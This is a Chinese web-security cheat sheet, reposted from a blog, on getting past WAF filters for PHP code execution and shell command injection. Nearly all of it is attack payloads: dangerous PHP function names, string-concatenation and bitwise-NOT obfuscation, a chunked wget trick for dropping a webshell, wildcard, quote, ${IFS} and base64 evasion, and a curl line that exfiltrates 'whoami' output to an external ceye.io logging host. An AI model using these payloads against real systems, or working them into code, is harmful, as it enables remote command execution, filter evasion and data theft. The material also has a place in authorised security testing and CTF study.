[web安全]命令执行&&代码执行 wafpass总结
2021-01-06 16:28
标签:vim 通配符 的区别 base oca exec creat replace 系统命令 php常见命令执行函数 php的动态执行 disable_function绕过 无字母getshell 限制输入字符数 linux中有查看功能的命令 windows 通配符 字符拼接 变量 编码 &,&&,|,||在windows和linux中的区别 一句话反弹shel linux各种一句话反弹shell总结 Windows下反弹shell的方法 DNS 借他文之手来获取字符 利用Linux的环境变量 [web安全]命令执行&&代码执行 wafpass总结 标签:vim 通配符 的区别 base oca exec creat replace 系统命令 原文地址:https://www.cnblogs.com/Ky1226/p/14223718.html命令执行&&代码执行 wafpass总结
代码执行
php代码
eval()
assert()
preg_replace
call_user_func()
call_user_func_array()
create_function
array_map()
系统命令代码
system()
passthru()
exec()
pcntl_exec()
shell_exec()
popen()
proc_open()
``
ob_start()
cmd=$_GET[func]($_GET[shell])&func=system&shell=cat flag
$e=‘sys‘.‘tem‘;$e(‘cat flag‘);
1.ld_preload
2.php_gc
取反~?code=(~%8f%97%8f%96%91%99%90)()//phpinfo()
>wget\>域名.\>com\>-O\>she\>ll.p\>p
ls -t>a
sh a
命令执行
cat、tac、more、less、head、tail、nl、
sed、sort、uniq、rev、vi、vim、od(以二进制的方式读取档案内容)
1. windows下 “和^和()不会影响命令执行
2.切割字符 %a:~0,3% 代表变量a 0-3个字符
eg.
set a=asdfghj
who$a:~0,1%mi whoami
linux windows
常见:
* :0-多
? :1
[abc] :abc
[a-c] :abc
[^abc]:没有abc
来了:
cat f[abc]lag
cat f[a-z]lag
cat fla*
双引号:"w"h"o"a"m"i linux windows
单引号: ‘w‘ho‘am‘i linux
反斜杠\: who\ami cat\flag linux
重定向: catflag cat保留变量名 无意义变量$+123456789 ${IFS} ${IFS}$9
cat${IFS}flag linux
echo d2hvYW1pCg== | base64 -d //执行whoami -d 意思是decode linux
windows可以使用powershell base64
& linux:后台运行 windows: 1 2 同时执行
1&&2 linux windows:1无错误运行2
| linux windows:上一条命令的输出,作为下一条命令参数(输入)
1||2 linux windows:1有错误运行2
curl xxxx.ceye.io/`whoami`
借助已有的字符进行拼接
echo ${PATH} => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
echo ${PATH:1:1} => u
文章标题:[web安全]命令执行&&代码执行 wafpass总结
文章链接:http://soscw.com/index.php/essay/40520.html